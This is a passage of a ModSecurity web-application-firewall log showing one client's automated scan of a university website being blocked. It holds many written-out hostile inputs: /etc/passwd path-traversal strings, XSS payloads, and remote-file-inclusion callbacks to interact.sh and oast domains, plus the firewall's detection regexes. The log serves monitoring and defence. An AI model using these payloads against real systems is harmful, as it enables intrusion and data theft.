"mbkm.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAAqhN-MAAAAE"]
[Tue Aug 29 11:54:55.725147 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAqRzGEAAAAM"]
[Tue Aug 29 11:54:56.540590 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0hxh4chqu9s3bx.oast.site found within TX:1: cjmnijtjmimvgniikdb0hxh4chqu9s3bx.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16IMCo-f0AAAqhOAAAAAAE"]
[Tue Aug 29 11:54:56.771947 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAAqWwbkAAAAl"]
[Tue Aug 29 11:54:57.543637 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAoz7@4AAAAS"]
[Tue Aug 29 11:54:57.543678 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAoz7@4AAAAS"]
[Tue Aug 29 11:54:58.289036 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAAoAk9cAAAAC"]
[Tue Aug 29 11:54:59.663013 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAoT7awAAAAD"]
[Tue Aug 29 11:54:59.667620 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAqTvmkAAAAa"]
[Tue Aug 29 11:55:02.885096 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAqY5@gAAAAr"]
[Tue Aug 29 11:55:03.891572 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16J8Co-f0AAAoAk@gAAAAC"]
[Tue Aug 29 11:55:04.551448 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAoz8BUAAAAS"]
[Tue Aug 29 11:55:05.554585 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAAqRzIYAAAAM"]
[Tue Aug 29 11:55:06.031434 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAApXglUAAAAU"]
[Tue Aug 29 11:55:06.595404 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAApXglwAAAAU"]
[Tue Aug 29 11:55:06.658594 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAApHRdMAAAAP"]
[Tue Aug 29 11:55:08.574397 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAAqTvoIAAAAa"]
[Tue Aug 29 11:55:11.570778 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAAqY5-8AAAAr"]
[Tue Aug 29 11:55:12.535960 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAAoz8DAAAAAS"]
[Tue Aug 29 11:55:12.608587 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAApOdiMAAAAL"]
[Tue Aug 29 11:55:14.557520 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAApbUdwAAAAh"]
[Tue Aug 29 11:55:14.688623 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAAoz8D4AAAAS"]
[Tue Aug 29 11:55:16.820732 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqY6BsAAAAr"]
[Tue Aug 29 11:55:16.948431 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqY6CEAAAAr"]
[Tue Aug 29 11:55:17.584332 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqeFTEAAAAx"]
[Tue Aug 29 11:55:17.717327 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqw51IAAAAH"]
[Tue Aug 29 11:55:18.734617 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqY6DcAAAAr"]
[Tue Aug 29 11:55:19.847636 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAqqtdIAAAAA"]
[Tue Aug 29 11:55:19.876218 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAqSwsQAAAAN"]
[Tue Aug 29 11:55:20.576896 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAqw51oAAAAH"]
[Tue Aug 29 11:55:22.630888 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAAolKm4AAAAe"]
[Tue Aug 29 11:55:22.651656 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAApa-N0AAAAg"]
